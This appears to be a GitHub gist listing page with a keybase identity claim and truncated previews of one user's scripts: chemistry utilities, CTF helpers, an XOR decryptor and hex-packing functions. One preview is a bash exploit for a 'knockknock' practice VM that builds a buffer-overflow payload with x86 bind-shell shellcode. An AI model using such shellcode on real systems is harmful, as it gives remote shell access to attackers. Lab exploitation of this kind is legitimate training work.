I hereby claim:
- I am barrebas on github.
- I am barrebas (https://keybase.io/barrebas) on keybase.
- I have a public key whose fingerprint is 73C4 E1D7 0FDC E570 D6C5 3C45 FB08 FDF3 959A 0031
To claim this, I am signing this object:
#!/usr/bin/python | |
''' | |
global variables | |
''' | |
k1 = 1.0 # value for rate constant | |
goal = 0.88 # Goal is the experimentally observed ratio | |
# between the peaks of undecenol DMPS ether and | |
# menthol DMPS ether. | |
''' |
#!/usr/bin/python | |
import re, math | |
from Tkinter import * | |
class Element(): | |
"""Element class""" | |
def __init__(self, label=None, stoichiometry=None, percentage=None, amount=None): | |
self.label = label |
from socket import * | |
import struct, telnetlib | |
def readtil(delim): | |
buf = b'' | |
while not delim in buf: | |
buf += s.recv(1) | |
return buf | |
def sendln(b): |
import sys | |
import glob | |
import commands | |
def search_dumps(function1, function2, diff): | |
addr1 = 0 | |
addr2 = 0 | |
# open all libc.so files |
#!/usr/bin/python | |
import urllib2 | |
import urllib | |
import pybel | |
molecule_name = raw_input() | |
molecule = urllib.pathname2url(molecule_name) | |
response = urllib2.urlopen("http://cactus.nci.nih.gov/chemical/structure/" + molecule + "/smiles") | |
smiles = response.read() |
I hereby claim:
To claim this, I am signing this object:
#!/bin/bash | |
# exploit for last stage of knockknock vm | |
echo "[+] building shellcode..." | |
$(python -c 'print "A"*4124+"\x93\x9e\x04\x08"+"\x83\xec\x7f\x6a\x66\x6a\x01\x5b\x58\x99\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x52\x66\x68\xfc\x15\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x6a\x66\x58\x43\x43\x6a\x05\x56\xcd\x80\x6a\x66\x58\x43\x52\x52\x56\x89\xe1\xcd\x80\x89\xc3\x6a\x3f\x58\x31\xc9\xcd\x80\x6a\x3f\x58\x41\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\x50\xb0\x0b\x59\xcd\x80"' > in.tfc) | |
if [ ! -f in.tfc ]; | |
then | |
echo "[!] shellcode not found!" |
#!/usr/bin/python | |
import string, sys | |
def decrypt(data, key): | |
return ''.join(chr(ord(x) ^ ord(key[i % len(key)])) for i, x in enumerate(data, 0)) | |
# Read dictionary of words used by scoreEnglishByWords() | |
def readdict(): | |
global english_words |
#!/usr/bin/python | |
def generateHex(val): | |
sVal = "" | |
sVal = sVal + "\\x" + "%02x" % (val & 0xff) | |
sVal = sVal + "\\x" + "%02x" % ((val >> 8) & 0xff) | |
sVal = sVal + "\\x" + "%02x" % ((val >> 16) & 0xff) | |
sVal = sVal + "\\x" + "%02x" % ((val >> 24) & 0xff) | |
return sVal |
#!/usr/bin/python | |
import sys | |
def generateHex(val): | |
sVal = "" | |
sVal = sVal + "\\x" + "%02x" % (val & 0xff) | |
sVal = sVal + "\\x" + "%02x" % ((val >> 8) & 0xff) | |
sVal = sVal + "\\x" + "%02x" % ((val >> 16) & 0xff) | |
sVal = sVal + "\\x" + "%02x" % ((val >> 24) & 0xff) | |